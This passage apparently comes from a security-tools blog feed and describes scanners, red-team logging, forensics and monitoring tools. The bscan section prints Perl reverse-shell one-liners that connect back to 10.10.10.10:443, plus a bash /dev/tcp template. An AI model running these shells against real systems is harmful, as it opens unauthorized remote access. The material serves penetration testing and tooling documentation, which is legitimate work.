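                      lambda m: f"{ANSI_RED}{m.group(0)}{ANSI_RESET}", text)
    return text

line = "80/tcp open http Microsoft IIS httpd 10.0"
print(highlight(line, [r"[Mm]icrosoft"]))
```

Run in a terminal, the matched "Microsoft" token is rendered in red, mirroring how the earlier `--patterns [Mm]icrosoft` example surfaces matches in scan output.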

Detailed Options
Here's what you should see when running bscan --help:
usage: bscan [OPTIONS] targets

_
| |__ ___ ___ __ _ _ __
| '_ \/ __|/ __/ _` | '_ \
| |_) \__ \ (__ (_| | | | |
|_.__/|___/\___\__,_|_| |_|

an asynchronous service enumeration tool

positional arguments:
targets the targets and/or networks on which to perform enumeration

optional arguments:
-h, --help show this help message and exit
--brute-pass-list F filename of password list to use for brute-forcing
--brute-user-list F filename of user list to use for brute-forcing
--cmd-print-width I the maximum integer number of characters allowed when printing
the command used to spawn a running subprocess (defaults to 80)
--config-dir D the base directory from which to load the configuration files;
required configuration files missing from this directory will
instead be loaded from the default files shipped with this
program
--hard force overwrite of existing directories
--max-concurrency I maximum integer number of subprocesses permitted to be running
concurrently (defaults to 20)
--no-program-check disable checking the presence of required system programs
--no-file-check disable checking the presence of files such as configured
wordlists
--no-service-scans disable running scans on discovered services
--output-dir D the base directory in which to write output files
--patterns [ [ ...]] regex patterns to highlight in output text
--ping-sweep enable ping sweep filtering of hosts from a network range
before running more intensive scans
--quick-only whether to only run the quick scan (and not include the
thorough scan over all ports)
--qs-method S the method for performing the initial TCP port scan; must
correspond to a configured port scan
--status-interval I integer number of seconds to pause in between printing status
updates; a non-positive value disables updates (defaults to 30)
--ts-method S the method for performing the thorough TCP port scan; must
correspond to a configured port scan
--udp whether to run UDP scans
--udp-method S the method for performing the UDP port scan; must correspond
to a configured port scan
--verbose-status whether to print verbose runtime status updates, based on
frequency specified by `--status-interval` flag
--version program version
--web-word-list F the wordlist to use for scans

Companion Tools
The main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.
bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here's a simple example:
$ bscan-wordlists --find "*win*"
/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt
/usr/share/wordlists/metasploit/sensitive_files_win.txt
/usr/share/seclists/Passwords/common-passwords-win.txt
Try bscan-wordlists --help to explore other options.
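Under the hood this kind of lookup is ordinary case-insensitive glob matching over a handful of wordlist directories. A self-contained sketch of the same idea using plain find (a temp directory stands in for /usr/share/wordlists so the example runs anywhere):

```shell
# Emulate a wordlist directory so the example is self-contained.
tmp=$(mktemp -d)
mkdir -p "$tmp/wordlists"
touch "$tmp/wordlists/dirTraversal-win.txt" "$tmp/wordlists/rockyou.txt"
# -iname performs the case-insensitive glob match, similar to --find "*win*"
matches=$(find "$tmp" -type f -iname "*win*")
echo "$matches"
rm -rf "$tmp"
```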
bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here's a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:
$ bscan-shells --port 443 10.10.10.10 | grep -i -A1 perl
perl for windows
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

perl with /bin/sh
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

perl without /bin/sh
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells --help to explore other options.
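Populating the target and port fields boils down to simple template substitution. A rough sketch of the idea (the TARGET/PORT placeholder names are assumptions for illustration, not the actual keys used in reverse-shells.toml):

```shell
# A one-liner template with placeholder fields...
template='bash -i >& /dev/tcp/TARGET/PORT 0>&1'
# ...filled in for a specific callback address, similar to what bscan-shells does.
filled=$(printf '%s' "$template" | sed -e 's/TARGET/10.10.10.10/' -e 's/PORT/443/')
echo "$filled"
```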

Development
Start by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):
# setup the environment
mkvirtualenv -p $(which python3) bscan-dev
workon bscan-dev

# get the deps
pip install -r dev-requirements.txt
Lint and type-check the project (these are run on Travis, too):
flake8 . && mypy bscan
When it's time to package a new release:
# build source and wheel distributions
python setup.py bdist_wheel sdist

# run post-build checks
twine check dist/*

# upload to PyPI
twine upload dist/*


RedELK - Easy Deployable Tool For Red Teams Used For Tracking And Alarming About Blue Team Activities As Well As Better Usability In Long Term Operations


Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability for the Red Team in long term operations.
Initial public release at BruCON 2018:

Goal of the project
Short: a Red Team's SIEM.
Longer: a Red Team's SIEM that serves three goals:
  1. Enhanced usability and overview for the red team operators by creating a central location where all relevant operational logs from multiple teamservers are collected and enriched. This is great for historic searching within the operation as well as giving a read-only view on the operation (e.g. for the White Team). Especially useful for multi-scenario, multi-teamserver, multi-member and multi-month operations. Also, super easy ways for viewing all screenshots, IOCs, keystrokes output, etc. \o/
  2. Spot the Blue Team by having a central location where all traffic logs from redirectors are collected and enriched. Using specific queries it's now possible to detect that the Blue Team is investigating your infrastructure.
  3. Out-of-the-box usable by being easy to install and deploy, as well as having ready made views, dashboards and alarms.
Here's a conceptual overview of how RedELK works.


RedELK uses the typical components Filebeat (shipping), Logstash (filtering), Elasticsearch (storage) and Kibana (viewing). Rsync is used for a second way of syncing teamserver data: logs, keystrokes, screenshots, etc. Nginx is used for authentication to Kibana, as well as for serving the screenshots, beacon logs and keystrokes in an easy way in the operator's browser.
A set of Python scripts is used for heavy enrichment of the log data and for Blue Team detection.

Supported tech and requirements
RedELK currently supports:
  • Cobalt Strike teamservers
  • HAProxy for HTTP redirector data. Apache support is expected soon.
  • Tested on Ubuntu 16 LTS
RedELK requires a modification to the default haproxy configuration in order to log more details.
In the 'general' section:
log-format frontend:%f/%H/%fi:%fp\ backend:%b\ client:%ci:%cp\ GMT:%T\ useragent:%[capture.req.hdr(1)]\ body:%[capture.req.hdr(0)]\ request:%r
At 'frontend' section:
declare capture request len 40000
http-request capture req.body id 0
capture request header User-Agent len 512

Installation
First time installation
Adjust ./certs/config.cnf to include the right details for the TLS certificates. Once done, run: initial-setup.sh This will create a CA, generate the necessary certificates for secure communication between redirs, teamserver and elkserver, and generate an SSH keypair for secure rsync authentication of the elkserver to the teamserver. It also generates teamservers.tgz, redirs.tgz and elkserver.tgz, which contain the installation packages for each component. Rerunning this initial setup is not required, but if you want new certificates for a new operation you can simply run it again.
Installation of redirectors
Copy and extract redirs.tgz on your redirector as part of your red team infra deployment procedures. Run: install-redir.sh $FilebeatID $ScenarioName $IP/DNS:PORT
  • $FilebeatID is the identifier of this redirector within filebeat.
  • $ScenarioName is the name of the attack scenario this redirector is used for.
  • $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.
This script will set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration and start filebeat.
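For example, registering a redirector as redir01 for scenario phish1, shipping logs to a RedELK server at 192.0.2.10:5044, would be invoked as follows (all values hypothetical; the block prints the invocation rather than running it, since the script only exists inside redirs.tgz):

```shell
# Hypothetical values: adjust the FilebeatID, scenario name and destination.
cmd='./install-redir.sh redir01 phish1 192.0.2.10:5044'
echo "$cmd"
```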
Installation of teamserver
Copy and extract teamservers.tgz on your Cobalt Strike teamserver as part of your red team infra deployment procedures. Run: install-teamserver.sh $FilebeatID $ScenarioName $IP/DNS:PORT
  • $FilebeatID is the identifier of this teamserver within filebeat.
  • $ScenarioName is the name of the attack scenario this teamserver is used for.
  • $IP/DNS:PORT is the IP or DNS name and port where filebeat logs are shipped to.
This script will warn if filebeat is already installed (important as ELK and filebeat sometimes are very picky about having equal versions), set the timezone (default Europe/Amsterdam), install filebeat and dependencies, install required certificates, adjust the filebeat configuration, start filebeat, create a local user 'scponly' and limit that user to SSH key-based auth via scp/sftp/rsync.
Installation of ELK server
Copy and extract elkserver.tgz on your RedELK server as part of your red team infra deployment procedures. Run: install-elkserver.sh This script will set the timezone (default Europe/Amsterdam), install logstash, elasticsearch, kibana and dependencies, install required certificates, deploy the logstash configuration and required custom ruby enrichment scripts, download GeoIP databases, install Nginx, configure Nginx, create a local user 'redelk' with the earlier generated SSH keys, install the script for rsyncing of remote logs on teamservers, install the script used for creating of thumbnails of screenshots, install the RedELK configuration files, install crontab file for RedELK tasks, install GeoIP elasticsearch plugins and adjust the template, install the python enrichment scripts, and finally install the python blue team detection scripts.
You are not done yet. You need to manually enter the details of your teamservers in /etc/cron.d/redelk, as well as tune the config files in /etc/redelk (see section below).
Setting up enrichment and detection
On the ELK server in the /etc/redelk directory you can find several files that you can use to tune your RedELK instance for better enrichments and better alarms. These files are:
  • /etc/redelk/iplist_customer.conf : public IP addresses of your target, one per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
  • /etc/redelk/iplist_redteam.conf : public IP addresses of your red team, one per line. Convenient for identifying testing done by red team members. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
  • /etc/redelk/iplist_unknown.conf : public IP addresses of gateways that you are not sure about yet, but don't want to be warned about again. One per line. Including an address here will set a tag for applicable records in the redirhaproxy-* index.
  • /etc/redelk/known_sandboxes.conf : beacon characteristics of known AV sandbox systems. One per line. Including data here will set a tag for applicable records in the rtops-* index.
  • /etc/redelk/known_testsystems.conf : beacon characteristics of known test systems. One per line. Including data here will set a tag for applicable records in the rtops-* index.
  • /etc/redelk/alarm.json.config: details required for alarms to work. This includes API keys for online services (Virus Total, IBM X-Force, etc) as well as the SMTP details required for sending alarms via e-mail.
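As an illustration, the iplist_* files are plain lists with one public IP address per line (example addresses from the documentation ranges):

```
198.51.100.23
203.0.113.7
```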
If you alter these files prior to your initial setup, these changes will be included in the .tgz packages and can be used for future installations. These files can be found in ./RedELK/elkserver/etc/redelk.
To change the Nginx authentication, edit /etc/nginx/htpasswd.users to include your preferred credentials, or edit ./RedELK/elkserver/etc/nginx/htpasswd.users prior to initial setup.

Under the hood
If you want to take a look under the hood on the ELK server, take a look at the redelk cron file in /etc/cron.d/redelk. It starts several scripts in /usr/share/redelk/bin/. Some scripts are for enrichment, others are for alarming. The configuration of these scripts is done with the config files in /etc/redelk/. There is also heavy enrichment done (including the generation of hyperlinks for screenshots, etc.) in logstash. You can check that out directly from the logstash config files in /etc/logstash/conf.d/.

Current state and features on todo-list
This project is still in alpha phase. This means that it works on our machines and our environment, but no extended testing is performed on different setups. This also means that naming and structure of the code is still subject to change.
We are working (and you are invited to contribute) on the following features for next versions:
  • Include the real external IP address of a beacon. As Cobalt Strike has no knowledge of the real external IP address of a beacon session, we need to get this from the traffic index. So far, we have not found a truly 100% reliable way of doing this.
  • Support for Apache redirectors. Fully tested and working filebeat and logstash configuration files that support Apache based redirectors. Possibly additional custom log configuration needed for Apache. Low priority.
  • Solve rsyslog max log line issue. Rsyslog (the default syslog service on Ubuntu) breaks long syslog lines. Depending on the CS profile you use, this can become an issue. As a result, some of the fields are not properly parsed by logstash, and thus not properly included in elasticsearch.
  • Ingest manual IOC data. When you are uploading a document, or something else, outside of Cobalt Strike, it will not be included in the IOC list. We want an easy way to have these manual IOCs also included. One way would be to enter the data manually in the activity log of Cobalt Strike and have a logstash filter to scrape the info from there.
  • Ingest e-mails. Create input and filter rules for IMAP mailboxes. This way, we can use the same easy ELK interface for having an overview of sent emails, and replies.
  • User-agent checks. Tagging and alarming on suspicious user-agents. This will probably be divided in hardcoded stuff like curl, wget, etc connecting with the proper C2 URL's, but also more dynamic analysis of suspicious user-agents.
  • DNS traffic analyses. Ingest, filter and query for suspicious activities on the DNS level. This will take considerable work due to the large amount of noise/bogus DNS queries performed by scanners and online DNS inventory services.
  • Other alarm channels. Think Slack, Telegram, whatever other way you want for receiving alarms.
  • Fine grained authorisation. Possibility for blocking certain views, searches, and dashboards, or masking certain details in some views. Useful for situations where you don't want to give out all information to all visitors.

Usage
First time login
Browse to your RedELK server's IP address and login with the credentials from Nginx (default is redelk:redelk). You are now in a Kibana interface. You may be asked to create a default index for kibana. You can select any of the available indices, it doesn't matter which one you pick.
There are probably two things you want to do here: look at dashboards, or look and search the data in more detail. You can switch between those views using the buttons on the left bar (default Kibana functionality).

Dashboards
Click on the dashboard icon on the left, and you'll be given 2 choices: Traffic and Beacon.




Looking and searching data in detail
Click on the Discover button to look at and search the data in more detail. Once there, click the time range you want to use and click on the 'Open' button to use one of the prepared searches with views.


Beacon data
When selecting the search 'TimelineOverview' you are presented with an easy to use view on the data from the Cobalt Strike teamservers, a time line of beacon events if you like. The view includes the relevant columns you want to have, such as timestamp, testscenario name, username, beacon ID, hostname, OS and OS version. Finally, the full message from Cobalt Strike is shown.


You can modify this search to your liking. Also, because it's Elasticsearch, you can search all the data in this index using the search bar.
Clicking on the details of a record will show you the full details. An important field for usability is the beaconlogfile field. This field is a hyperlink, linking to the full beacon log file this record is from. It allows you to look at the beacon transcript in a bigger window and use CTRL+F within it.


Screenshots
RedELK comes with an easy way of looking at all the screenshots that were made from your targets. Select the 'Screenshots' search to get this overview. We added two big usability things: thumbnails and hyperlinks to the full pictures. The thumbnails are there to quickly scroll through and give you an immediate impression: often you still remember what the screenshot looked like.


Keystrokes
Just as with screenshots, it's very handy to have an easy overview of all keystrokes. This search gives you the first lines of content, as well as a hyperlink to the full keystrokes log file.


IOC data
To get a quick list of all IOCs, RedELK comes with an easy overview. Just use the 'IOCs' search to get this list. This will present all IOC data from Cobalt Strike, both from files and from services.



You can quickly export this list by hitting the 'Reporting' button in the top bar to generate a CSV of this exact view.
Logging of RedELK
During installation all actions are logged in a log file in the current working directory.
During operations, all RedELK specific logs are logged on the ELK server in /var/log/redelk. You probably only need this for troubleshooting.

Authors and contribution
This project is developed and maintained by:
  • Marc Smeets (@smeetsie on Github and @mramsmeets on Twitter).
  • Mark Bergman (@xychix on Github and Twitter)



Goscan - Interactive Network Scanner


GoScan is an interactive network scanner client, featuring auto-completion, which provides abstraction and automation over nmap.
Although it started as a small side-project I developed in order to learn @golang, GoScan can now be used to perform host discovery, port scanning, and service enumeration not only in situations where being stealthy is not a priority and time is limited (think CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements.
GoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of "screen", etc.), given that it fires scans and maintains their state in an SQLite database. Scans run in the background (detached from the main thread), so even if the connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong.
In addition, the Service Enumeration phase integrates a collection of other tools (e.g., EyeWitness, Hydra, nikto, etc.), each one tailored to target a specific service. 

Installation

Binary installation (Recommended)
Binaries are available from the Release page.
# Linux (64bit)
$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_amd64.zip
$ unzip goscan_2.1_linux_amd64.zip

# Linux (32bit)
$ wget https://github.com/marco-lancini/goscan/releases/download/v2.1/goscan_2.1_linux_386.zip
$ unzip goscan_2.1_linux_386.zip

# After that, place the executable in your PATH
$ chmod +x goscan
$ sudo mv ./goscan /usr/local/bin/goscan

Build from source
$ git clone https://github.com/marco-lancini/goscan.git
$ cd goscan/goscan/
$ make setup
$ make build
To create a multi-platform binary, use the cross command via make:
$ make cross

Docker
$ git clone https://github.com/marco-lancini/goscan.git
$ cd goscan/
$ docker-compose up --build

Usage
GoScan supports all the main steps of network enumeration:


StepCommands
1. Load targets
  • Add a single target via the CLI (must be a /32): load target SINGLE <IP>
  • Upload multiple targets from a text file or folder: load target MULTI <path-to-file>
2. Host Discovery
  • Perform a Ping Sweep: sweep <TYPE> <TARGET>
  • Or load results from a previous discovery:
    • Add a single alive host via the CLI (must be a /32): load alive SINGLE <IP>
    • Upload multiple alive hosts from a text file or folder: load alive MULTI <path-to-file>
3. Port Scanning
  • Perform a port scan: portscan <TYPE> <TARGET>
  • Or upload nmap results from XML files or folder: load portscan <path-to-file>
4. Service Enumeration
  • Dry Run (only show commands, without performing them): enumerate <TYPE> DRY <TARGET>
  • Perform enumeration of detected services: enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET>
5. Special Scans
  • EyeWitness
    • Take screenshots of websites, RDP services, and open VNC servers (KALI ONLY): special eyewitness
    • EyeWitness.py needs to be in the system path
  • Extract (Windows) domain information from enumeration data
    • special domain <users/hosts/servers>
  • DNS
    • Enumerate DNS (nmap, dnsrecon, dnsenum): special dns DISCOVERY <domain>
    • Bruteforce DNS: special dns BRUTEFORCE <domain>
    • Reverse Bruteforce DNS: special dns BRUTEFORCE_REVERSE <domain> <base_IP>
Utils
  • Show results: show <targets/hosts/ports>
  • Change the output folder (by default ~/goscan): set output_folder <PATH>
  • Modify the default nmap switches: set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES>
  • Modify the default wordlists: set_wordlists <FINGER_USER/FTP_USER/...> <PATH>
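Putting the steps together, a session might look like the following illustrative transcript (the prompt and the placeholder <TYPE> values are assumptions; use the interactive auto-completion to see the exact values your build supports):

```
[goscan] > load target SINGLE 10.10.10.1
[goscan] > sweep PING 10.10.10.1
[goscan] > portscan TCP-FULL 10.10.10.1
[goscan] > enumerate ALL DRY 10.10.10.1
```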

External Integrations
The Service Enumeration phase currently supports the following integrations:
WHATINTEGRATION
ARP
  • nmap
DNS
  • nmap
  • dnsrecon
  • dnsenum
  • host
FINGER
  • nmap
  • finger-user-enum
FTP
  • nmap
  • ftp-user-enum
  • hydra [AGGRESSIVE]
HTTP
  • nmap
  • nikto
  • dirb
  • EyeWitness
  • sqlmap [AGGRESSIVE]
  • fimap [AGGRESSIVE]
RDP
  • nmap
  • EyeWitness
SMB
  • nmap
  • enum4linux
  • nbtscan
  • samrdump
SMTP
  • nmap
  • smtp-user-enum
SNMP
  • nmap
  • snmpcheck
  • onesixtyone
  • snmpwalk
SSH
  • hydra [AGGRESSIVE]
SQL
  • nmap
VNC
  • EyeWitness


DFIRTrack - The Incident Response Tracking Application


DFIRTrack (Digital Forensics and Incident Response Tracking application) is an open source web application mainly based on Django using a PostgreSQL database backend.
In contrast to other great incident response tools, which are mainly case-based and support the work of CERTs, SOCs etc. in their daily business, DFIRTrack is focused on handling one major incident with a lot of affected systems, as is often observed in APT cases. It is meant to be used as a tool for dedicated incident response teams in large cases. So, of course, CERTs and SOCs may use DFIRTrack as well, but they may find it more appropriate for special cases than for everyday work.
In contrast to case-based applications, DFIRTrack works in a system-based fashion. It keeps track of the status of various systems and the tasks associated with them, keeping the analyst well-informed about the status and number of affected systems at any time during the investigation phase up to the remediation phase of the incident response process.

Features
One focus is the fast and reliable import and export of systems and associated information. The goal for importing systems is to provide a fast and error-free procedure. Moreover, the goal for exporting systems and their status is to have multiple instances of documentation: for instance, detailed Markdown reports for technical staff vs. spreadsheets for non-technical audiences without redundancies and deviations in the data sets. A manager whose numbers match is a happy manager! ;-)
The following functions are implemented for now:
  • Importer
    • Creator (fast creation of multiple related instances via web interface) for systems and tasks,
    • CSV (simple and generic CSV based import (either hostname and IP or hostname and tags combined with a web form), should fit for the export capabilities of many tools),
    • Markdown for entries (one entry per system(report)).
  • Exporter
    • Markdown for so-called system reports (for use in a MkDocs structure),
    • Spreadsheet (CSV and XLS),
    • LaTeX (planned).
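As an illustration, a minimal import file for the hostname-and-IP CSV variant described above might look like this (the exact column mapping is configured via the web form, so treat the layout as an assumption):

```
srv-web-01,10.0.0.11
srv-db-01,10.0.0.12
```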

Installation and dependencies
DFIRTrack is developed for deployment on Debian Stretch or Ubuntu 16.04. Other Debian-based distributions or versions may work but have not been tested yet. At the moment the project is focused on Ubuntu LTS and Debian releases.
For fast and uncomplicated installation on a dedicated server, including all dependencies, an Ansible playbook and role were written (available here). For testing, a Docker environment was prepared (see below).
For a minimal setup the following dependencies are needed:
  • django (2.0),
  • django_q,
  • djangorestframework,
  • gunicorn,
  • postgresql,
  • psycopg2-binary,
  • python3-pip,
  • PyYAML,
  • requests,
  • virtualenv,
  • xlwt.
Note that there is no settings.py in this repository. This file is submitted via Ansible or has to be copied and configured by hand. That will be changed in the future (see issues for more information).

Docker Environment
An experimental Docker Compose environment for local-only usage is provided in this project. Run the following command in the project root directory to start the environment:
docker-compose up
A user admin is already created. A password can be set with:
docker/setup_admin.sh
The application is located at localhost:8000.

Built-in software
The application was created by implementing the following libraries and code:

Development
There are two main branches:
  • master
  • development
The master branch should be stable (as far as you can expect from an alpha version). New features and changes are added to the development branch and merged into master from time to time. Everything merged into development should run too but might need manual changes (e.g. config). The development branch of DFIRTrack Ansible follows these changes. So if you want to see the latest features and progress: "check out" development.

Disclaimer
This software is in an early alpha phase so a lot of work has to be done. Even if some basic error checking is implemented, as of now the usage of DFIRTrack mainly depends on proper handling.
DFIRTrack was not and most likely will never be intended for usage on publicly available servers. Nevertheless, some basic security features were implemented (in particular in connection with the corresponding Ansible role). Always install DFIRTrack in a secured environment (e.g. a dedicated virtual machine or a separated network)!


CANalyzat0r - Security Analysis Toolkit For Proprietary Car Protocols


This software project is a result of a Bachelor's thesis created at SCHUTZWERK in collaboration with Aalen University by Philipp Schmied.
Please refer to the corresponding blog post for more information.

Why another CAN tool?
  • Built from scratch with new ideas for analysis mechanisms
  • Bundles features of many other tools in one place
  • Modular and extensible: Read the docs and implement your own analysis mechanisms
  • Comfortable analysis using a GUI
  • Manage work in separate projects using a database
  • Documentation: Read the docs if you need a manual or technical info.

Installing and running:
  • Run sudo ./install_requirements.sh, followed by sudo -E ./CANalyzat0r.sh. This will create a folder called pipenv with a pipenv environment in it.
  • Or just use the docker version which is recommended at this time (Check the README.md file in the subdirectory)
For more information, read the HTML or PDF version of the documentation in the ./doc/build folder.

Features
  • Manage interface configuration (automatic loading of kernel modules, manage physical and virtual SocketCAN devices)
  • Multi interface support
  • Manage your work in projects. You can also import and export them in the human readable/editable JSON format
  • Logging of all actions
  • Graphical sniffing
  • Manage findings, dumps and known packets per project
  • Easy copy and paste between tabs. Also, you can just paste your SocketCAN files into a table that allows pasting
  • Threaded Sending, Fuzzing and Sniffing 




  • Add multiple analyzing threads on the GUI
  • Ignore packets when sniffing - Automatically filter unique packets by ID or data and ID
  • Compare dumps
  • Allows setting up complex setups using only one window
  • Clean organization in tabs for each analysis task
  • Binary packet filtering with randomization
  • Search for action specific packets using background noise filtering

  • SQLite support
  • Fuzz and change the values on the fly

Testing It
You can use the Instrument Cluster Simulator in order to tinker with a virtual CAN bus without having to attach real CAN devices to your machine.

Troubleshooting

Empty GUI Windows
Please make sure that the QT_X11_NO_MITSHM environment variable is set to 1. When using sudo, please include the -E option in order to preserve this environment variable, as follows: sudo -E ./CANalyzat0r.sh.

Fixing the GUI style
This application has to be run as superuser. Because of a missing configuration, the displayed style can be set to an unwanted value when the effective UID is 0. To fix this behaviour, follow these steps:
  • Quick way: Execute printf '[QT]\nstyle=CleanLooks\n' >> ~/.config/Trolltech.conf
  • Alternative way:
    • Install qt4-qtconfig: sudo apt-get install qt4-qtconfig
    • Run qtconfig-qt4 as superuser and change the GUI style to CleanLooks or GTK+
  • Or use the docker container

Process Hacker - A Free, Powerful, Multi-Purpose Tool That Helps You Monitor System Resources, Debug Software And Detect Malware

A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.

System requirements
Windows 7 or higher, 32-bit or 64-bit.

Features
  • A detailed overview of system activity with highlighting.
  • Graphs and statistics allow you to quickly track down resource hogs and runaway processes.
  • Can't edit or delete a file? Discover which processes are using that file.
  • See what programs have active network connections, and close them if necessary.
  • Get real-time information on disk access.
  • View detailed stack traces with kernel-mode, WOW64 and .NET support.
  • Go beyond services.msc: create, edit and control services.
  • Small, portable and no installation required.
  • 100% Free Software (GPL v3)

Building the project
Requires Visual Studio (2017 or later).
Execute build_release.cmd located in the build directory to compile the project, or load the ProcessHacker.sln and Plugins.sln solutions if you prefer building the project using Visual Studio.
You can download the free Visual Studio Community Edition to build, run or develop Process Hacker.

Additional information
You cannot run the 32-bit version of Process Hacker on a 64-bit system and expect it to work correctly, unlike other programs.

Enhancements/Bugs
Please use the GitHub issue tracker for reporting problems or suggesting new features.

Settings
If you are running Process Hacker from a USB drive, you may want to save Process Hacker's settings there as well. To do this, create a blank file named "ProcessHacker.exe.settings.xml" in the same directory as ProcessHacker.exe. You can do this using Windows Explorer:
1. Make sure "Hide extensions for known file types" is unticked in Tools > Folder options > View.
2. Right-click in the folder and choose New > Text Document.
3. Rename the file to ProcessHacker.exe.settings.xml (delete the ".txt" extension).

Plugins
Plugins can be configured from Hacker > Plugins.
If you experience any crashes involving plugins, make sure they are up to date.
Disk and Network information provided by the ExtendedTools plugin is only available when running Process Hacker with administrative rights.

KProcessHacker
Process Hacker uses a kernel-mode driver, KProcessHacker, to assist with certain functionality. This includes:
  • Capturing kernel-mode stack traces
  • More efficiently enumerating process handles
  • Retrieving names for file handles
  • Retrieving names for EtwRegistration objects
  • Setting handle attributes
Note that by default, KProcessHacker only allows connections from processes with administrative privileges (SeDebugPrivilege). To allow Process Hacker to show details for all processes when it is not running as administrator:
1. In Registry Editor, navigate to: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KProcessHacker3
2. Under this key, create a key named Parameters if it does not exist.
3. Create a DWORD value named SecurityLevel and set it to 2. If you are not using an official build, you may need to set it to 0 instead.
4. Restart the KProcessHacker3 service (sc stop KProcessHacker3, sc start KProcessHacker3).
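Steps 1-4 can also be performed from an elevated command prompt; a sketch of the equivalent reg.exe and sc invocations (the /f flag creates the Parameters key if it does not already exist):

```
reg add "HKLM\SYSTEM\CurrentControlSet\Services\KProcessHacker3\Parameters" /v SecurityLevel /t REG_DWORD /d 2 /f
sc stop KProcessHacker3
sc start KProcessHacker3
```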


    OSFMount - Mount Disk Images & Create RAM Drives

    $
    0
    0

    OSFMount allows you to mount local disk image files (bit-for-bit copies of a disk partition) in Windows with a drive letter. You can then analyze the disk image file with PassMark OSForensics™ by using the mounted volume's drive letter. By default, the image files are mounted as read only so that the original image files are not altered.

    OSFMount also supports the creation of RAM disks: disks mounted in RAM. This generally has a large speed benefit over using a hard disk, so it is useful for applications requiring high-speed disk access, such as database applications, games (game cache files) and browsers (cache files). A second benefit is security: the disk contents are stored in RAM rather than on a physical hard disk, so they do not persist across system shutdown. At the time of writing, we believe this is the fastest RAM drive software available.

    OSFMount supports mounting images of CDs in .ISO format, which can be useful when a particular CD is used often and the speed of access is important.


    HTTrack Website Copier - Web Crawler And Offline Browser


    HTTrack allows you to download a World Wide Web site from the Internet to a local directory, recursively building all directories and getting HTML, images, and other files from the server to your computer. HTTrack preserves the original site's relative link structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site and resume interrupted downloads. HTTrack is fully configurable and has an integrated help system.
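The recursive mirroring described above can be sketched in a few lines (a toy illustration of the crawl idea, not HTTrack's implementation; the SITE dict is a stand-in for fetching a page and extracting its links):

```python
from collections import deque

# Toy "site": each page maps to the links it contains.
SITE = {
    "/index.html": ["/about.html", "/docs/a.html"],
    "/about.html": ["/index.html"],
    "/docs/a.html": ["/docs/b.html"],
    "/docs/b.html": [],
}

def mirror(start, fetch_links):
    """Breadth-first crawl: visit every reachable page once, as when building a local mirror."""
    seen = {start}
    queue = deque([start])
    while queue:
        page = queue.popleft()
        for link in fetch_links(page):
            if link not in seen:
                seen.add(link)
                queue.append(link)
    return seen

pages = mirror("/index.html", SITE.__getitem__)
```

A real mirror would additionally save each page to disk and rewrite its links to relative local paths.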

    WinHTTrack is the Windows (from Windows 2000 to Windows 10 and above) release of HTTrack, and WebHTTrack the Linux/Unix/BSD release.



    Volatility Workbench - A GUI For Volatility Memory Forensics


    Volatility Workbench is a graphical user interface (GUI) for the Volatility tool. Volatility is a command line memory analysis and forensics tool for extracting artifacts from memory dumps. Volatility Workbench is free, open source and runs in Windows. 

    It provides a number of advantages over the command line version including:
    • No need to remember command line parameters.
    • Storage of the operating system profile, KDBG address and process list with the memory dump, in a .CFG file. When a memory image is re-loaded, this saves a lot of time and avoids the frustration of not knowing the correct profile to select.
    • Simpler copy & paste.
    • Simpler printing of paper copies (via right click).
    • Simpler saving of the dumped information to a file on disk.
    • A drop down list of available commands and a short description of what the command does.
    • Time stamping of the commands executed.
    • Auto-loading the first dump file found in the current folder.
    • Support for analysing Mac and Linux memory dumps.
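The .CFG idea above, caching the detected profile next to the dump so it never has to be re-detected, can be sketched with configparser (an illustration of the concept only; Workbench's actual file format is not documented here):

```python
import configparser
import os
import tempfile

def save_profile(dump_path, profile, kdbg):
    """Remember the detected profile beside the dump so re-analysis skips detection."""
    cfg = configparser.ConfigParser()
    cfg["volatility"] = {"profile": profile, "kdbg": kdbg}
    with open(dump_path + ".cfg", "w") as fh:
        cfg.write(fh)

def load_profile(dump_path):
    """Return the cached settings as a dict, or None if no .cfg exists yet."""
    path = dump_path + ".cfg"
    if not os.path.exists(path):
        return None
    cfg = configparser.ConfigParser()
    cfg.read(path)
    return dict(cfg["volatility"])

# Usage: first run saves the profile, later runs load it instantly.
with tempfile.TemporaryDirectory() as d:
    dump = os.path.join(d, "memory.dmp")
    save_profile(dump, "Win7SP1x64", "0xf80002c430a0")
    info = load_profile(dump)
```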


    Hontel - Telnet Honeypot


